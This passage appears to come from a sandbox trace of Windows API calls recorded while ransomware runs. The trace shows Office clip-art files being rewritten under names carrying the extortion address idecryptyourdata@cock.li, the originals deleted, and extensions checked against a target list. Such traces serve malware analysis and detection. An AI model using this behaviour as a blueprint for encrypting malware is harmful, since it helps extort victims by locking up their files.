lpOverlapped=0x0) returned 1 [0066.355] SetEndOfFile (hFile=0x2c0) returned 1 [0066.356] CloseHandle (hObject=0x2c0) returned 1 [0066.356] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.356] SetEndOfFile (hFile=0x2c8) returned 1 [0066.357] CloseHandle (hObject=0x2c8) returned 1 [0066.357] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.357] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00775_.wmf")) returned 1 [0066.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 68 [0066.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 68 [0066.357] lstrlenW (lpString=".doc") returned 4 [0066.357] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.358] lstrlenW (lpString=".docx") returned 5 [0066.358] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.358] lstrlenW (lpString=".pdf") returned 4 [0066.358] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.358] lstrlenW (lpString=".xls") returned 4 [0066.358] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.358] lstrlenW (lpString=".xlsx") returned 5 [0066.358] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.358] lstrlenW (lpString=".ppt") returned 4 [0066.358] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 68 [0066.358] lstrlenW (lpString=".zip") returned 4 [0066.358] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.358] lstrlenW (lpString=".rar") returned 4 [0066.358] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.358] lstrlenW (lpString=".bz2") returned 4 [0066.358] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.358] lstrlenW (lpString=".7z") returned 3 [0066.358] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 68 [0066.358] lstrlenW (lpString=".dbf") returned 4 [0066.358] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 68 [0066.358] lstrlenW (lpString=".1cd") returned 4 [0066.358] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 68 [0066.358] lstrlenW (lpString=".jpg") returned 4 [0066.358] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.359] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.359] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00799_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0066.359] GetLastError () returned 0x0 [0066.359] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x3690, lpOverlapped=0x0) returned 1 [0066.383] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x36a0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x36a0, lpOverlapped=0x0) returned 1 [0066.384] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.384] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.385] SetEndOfFile (hFile=0x2c0) returned 1 [0066.386] CloseHandle (hObject=0x2c0) returned 1 [0066.387] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.387] SetEndOfFile (hFile=0x2c8) returned 1 [0066.388] CloseHandle (hObject=0x2c8) returned 1 [0066.388] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.388] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00799_.wmf")) returned 1 [0066.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 68 [0066.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 68 [0066.389] lstrlenW (lpString=".doc") returned 4 [0066.389] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.389] lstrlenW (lpString=".docx") returned 5 [0066.389] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.389] lstrlenW (lpString=".pdf") returned 4 [0066.389] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.389] lstrlenW (lpString=".xls") returned 4 [0066.389] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.389] lstrlenW (lpString=".xlsx") returned 5 [0066.389] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.389] lstrlenW (lpString=".ppt") returned 4 [0066.389] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 68 [0066.389] lstrlenW (lpString=".zip") returned 4 [0066.389] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.389] lstrlenW (lpString=".rar") returned 4 [0066.389] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.390] lstrlenW (lpString=".bz2") returned 4 [0066.390] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.390] lstrlenW (lpString=".7z") returned 3 [0066.390] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 68 [0066.390] lstrlenW (lpString=".dbf") returned 4 [0066.390] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 68 [0066.390] lstrlenW (lpString=".1cd") returned 4 [0066.390] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 68 [0066.390] lstrlenW (lpString=".jpg") returned 4 [0066.390] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.391] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.392] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01074_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0066.392] GetLastError () returned 0x0 [0066.392] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x121a, lpOverlapped=0x0) returned 1 [0066.432] WriteFile (in: hFile=0x384, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1220, lpOverlapped=0x0) returned 1 [0066.433] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.433] WriteFile (in: hFile=0x384, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.434] SetEndOfFile (hFile=0x384) returned 1 [0066.434] CloseHandle (hObject=0x384) returned 1 [0066.434] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.434] SetEndOfFile (hFile=0x340) returned 1 [0066.435] CloseHandle (hObject=0x340) returned 1 [0066.435] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.435] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01074_.wmf")) returned 1 [0066.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 68 [0066.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 68 [0066.435] lstrlenW (lpString=".doc") returned 4 [0066.435] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.436] lstrlenW (lpString=".docx") returned 5 [0066.436] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.436] lstrlenW (lpString=".pdf") returned 4 [0066.436] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.436] lstrlenW (lpString=".xls") returned 4 [0066.436] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.436] lstrlenW (lpString=".xlsx") returned 5 [0066.436] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.436] lstrlenW (lpString=".ppt") returned 4 [0066.436] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 68 [0066.436] lstrlenW (lpString=".zip") returned 4 [0066.436] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.436] lstrlenW (lpString=".rar") returned 4 [0066.436] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.436] lstrlenW (lpString=".bz2") returned 4 [0066.436] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.436] lstrlenW (lpString=".7z") returned 3 [0066.436] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 68 [0066.436] lstrlenW (lpString=".dbf") returned 4 [0066.436] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 68 [0066.436] lstrlenW (lpString=".1cd") returned 4 [0066.436] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 68 [0066.436] lstrlenW (lpString=".jpg") returned 4 [0066.436] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.436] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.437] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01176_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0066.437] GetLastError () returned 0x0 [0066.437] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1378, lpOverlapped=0x0) returned 1 [0066.449] WriteFile (in: hFile=0x384, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1380, lpOverlapped=0x0) returned 1 [0066.450] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.450] WriteFile (in: hFile=0x384, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.450] SetEndOfFile (hFile=0x384) returned 1 [0066.453] CloseHandle (hObject=0x384) returned 1 [0066.453] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.453] SetEndOfFile (hFile=0x340) returned 1 [0066.454] CloseHandle (hObject=0x340) returned 1 [0066.454] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.454] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01176_.wmf")) returned 1 [0066.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 68 [0066.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 68 [0066.455] lstrlenW (lpString=".doc") returned 4 [0066.455] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.455] lstrlenW (lpString=".docx") returned 5 [0066.455] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.455] lstrlenW (lpString=".pdf") returned 4 [0066.455] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.455] lstrlenW (lpString=".xls") returned 4 [0066.455] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.455] lstrlenW (lpString=".xlsx") returned 5 [0066.455] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.455] lstrlenW (lpString=".ppt") returned 4 [0066.455] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 68 [0066.455] lstrlenW (lpString=".zip") returned 4 [0066.455] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.455] lstrlenW (lpString=".rar") returned 4 [0066.455] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.455] lstrlenW (lpString=".bz2") returned 4 [0066.455] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.455] lstrlenW (lpString=".7z") returned 3 [0066.455] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 68 [0066.455] lstrlenW (lpString=".dbf") returned 4 [0066.455] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 68 [0066.455] lstrlenW (lpString=".1cd") returned 4 [0066.455] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 68 [0066.455] lstrlenW (lpString=".jpg") returned 4 [0066.455] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.465] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.465] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01193_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0066.481] GetLastError () returned 0x0 [0066.481] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x488, lpOverlapped=0x0) returned 1 [0066.494] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x490, lpOverlapped=0x0) returned 1 [0066.495] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.495] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.495] SetEndOfFile (hFile=0x2c0) returned 1 [0066.495] CloseHandle (hObject=0x2c0) returned 1 [0066.495] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.495] SetEndOfFile (hFile=0x388) returned 1 [0066.496] CloseHandle (hObject=0x388) returned 1 [0066.496] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.496] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01193_.wmf")) returned 1 [0066.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 68 [0066.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 68 [0066.496] lstrlenW (lpString=".doc") returned 4 [0066.496] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.496] lstrlenW (lpString=".docx") returned 5 [0066.497] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.497] lstrlenW (lpString=".pdf") returned 4 [0066.497] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.497] lstrlenW (lpString=".xls") returned 4 [0066.497] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.497] lstrlenW (lpString=".xlsx") returned 5 [0066.497] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.497] lstrlenW (lpString=".ppt") returned 4 [0066.497] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 68 [0066.497] lstrlenW (lpString=".zip") returned 4 [0066.497] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.497] lstrlenW (lpString=".rar") returned 4 [0066.497] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.497] lstrlenW (lpString=".bz2") returned 4 [0066.497] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.497] lstrlenW (lpString=".7z") returned 3 [0066.497] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 68 [0066.497] lstrlenW (lpString=".dbf") returned 4 [0066.497] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 68 [0066.497] lstrlenW (lpString=".1cd") returned 4 [0066.497] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 68 [0066.497] lstrlenW (lpString=".jpg") returned 4 [0066.497] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.523] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.523] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01659_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0066.523] GetLastError () returned 0x0 [0066.523] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x79cc, lpOverlapped=0x0) returned 1 [0066.537] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x79d0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x79d0, lpOverlapped=0x0) returned 1 [0066.538] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.538] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.538] SetEndOfFile (hFile=0x2c0) returned 1 [0066.540] CloseHandle (hObject=0x2c0) returned 1 [0066.540] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.540] SetEndOfFile (hFile=0x388) returned 1 [0066.542] CloseHandle (hObject=0x388) returned 1 [0066.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.542] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01659_.wmf")) returned 1 [0066.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 68 [0066.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 68 [0066.543] lstrlenW (lpString=".doc") returned 4 [0066.543] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.543] lstrlenW (lpString=".docx") returned 5 [0066.543] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.543] lstrlenW (lpString=".pdf") returned 4 [0066.543] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.543] lstrlenW (lpString=".xls") returned 4 [0066.543] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.543] lstrlenW (lpString=".xlsx") returned 5 [0066.543] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.543] lstrlenW (lpString=".ppt") returned 4 [0066.543] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.543] lstrlenW (lpString="C:\\Program Files\\Microsoft 